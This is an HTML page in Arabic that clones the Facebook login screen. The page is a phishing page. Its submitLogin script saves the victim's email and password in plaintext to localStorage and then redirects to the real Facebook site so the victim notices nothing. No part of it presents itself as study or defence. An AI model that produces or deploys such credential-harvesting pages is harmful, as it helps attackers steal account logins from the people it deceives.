<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>تسجيل الدخول - فيس بوك</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #e9eff1;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            width: 100%;
            max-width: 450px;
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            padding: 40px;
        }

        .logo {
            text-align: center;
            margin-bottom: 40px;
        }

        .logo img {
            width: 50px;
        }

        .logo span {
            font-size: 32px;
            font-weight: bold;
            color: #1877f2;
        }

        .login-form input {
            width: 100%;
            padding: 12px;
            margin: 10px 0;
            font-size: 16px;
            border: 1px solid #dddfe2;
            border-radius: 5px;
            box-sizing: border-box;
        }

        .login-form button {
            width: 100%;
            padding: 12px;
            background-color: #1877f2;
            color: white;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .login-form button:hover {
            background-color: #145dbf;
        }

        .forgot-password {
            text-align: center;
            margin-top: 15px;
        }

        .forgot-password a {
            text-decoration: none;
            color: #1877f2;
            font-size: 14px;
        }

        .signup-link {
            text-align: center;
            margin-top: 30px;
        }

        .signup-link a {
            text-decoration: none;
            color: #42b72a;
            font-size: 14px;
        }

        .footer {
            text-align: center;
            margin-top: 30px;
            font-size: 12px;
            color: #90949c;
        }

        .footer a {
            color: #90949c;
            text-decoration: none;
        }

        .footer p {
            margin: 5px;
        }
    </style>
</head>
<body>

    <!-- شعار فيس بوك مع النص -->
    <div class="container">
        <div class="logo">
            <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo">
            <span>Facebook</span>
        </div>

        <!-- محتوى الصفحة -->
        <div class="login-form">
            <input type="email" id="email" placeholder="البريد الإلكتروني أو رقم الهاتف" />
            <input type="password" id="password" placeholder="كلمة المرور" />
            <button onclick="submitLogin()">تسجيل الدخول</button>
        </div>

        <!-- رابط كلمة المرور المفقودة -->
        <div class="forgot-password">
            <a href="#">هل نسيت كلمة السر؟</a>
        </div>

        <!-- رابط التسجيل في فيس بوك -->
        <div class="signup-link">
            <p>ليس لديك حساب؟ <a href="#">إنشاء حساب جديد</a></p>
        </div>

    </div>

    <div class="footer">
        <p><a href="#">إخلاء المسؤولية</a> · <a href="#">الخصوصية</a> · <a href="#">الشروط</a></p>
    </div>

    <script>
        // دالة لتسجيل الدخول وحفظ البيانات في الملاحظات
        function submitLogin() {
            var email = document.getElementById("email").value;
            var password = document.getElementById("password").value;

            if (email === "" || password === "") {
                alert("يرجى إدخال البريد الإلكتروني وكلمة المرور.");
                return;
            }

            // الحصول على التاريخ الحالي
            var currentDate = new Date();
            var dateString = currentDate.toLocaleString(); // التاريخ والوقت الحاليين

            // إنشاء الملاحظة مع التاريخ
            var noteContent = "البريد الإلكتروني: " + email + " - كلمة المرور: " + password;

            // الحصول على الملاحظات المخزنة في localStorage
            var notes = JSON.parse(localStorage.getItem("notes")) || [];

            // إضافة الملاحظة الجديدة مع التاريخ
            notes.push({ content: noteContent, date: dateString });

            // حفظ الملاحظات في localStorage
            localStorage.setItem("notes", JSON.stringify(notes));

            // بعد حفظ البيانات، الانتقال إلى صفحة فيس بوك
            window.location.href = "https://web.facebook.com/"; // انتقل إلى صفحة فيس بوك الفعلية
        }
    </script>

</body>
</html>
